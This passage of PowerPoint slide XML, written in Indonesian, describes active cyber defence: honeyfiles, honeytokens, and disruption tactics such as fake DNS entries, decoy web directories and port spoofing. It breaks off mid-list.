            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>realistis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berinteraksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Honeyfiles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tampaknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>upaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencuri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data. Honeytokens </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> login, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tipe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data lain yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengalihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perhatian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memicu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peringatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>wawasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memantau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengumpulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intelijen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metodenya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>proaktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertahankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di masa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendatang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Alat-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengalihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perhatian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebenarnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berhasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Gangguan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Jenis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengadopsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaburan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jahat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tujuannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menaikkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>musuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meliputi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>entri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendaftarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>direktori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>halaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinamis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperlambat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemicuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> spoofing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
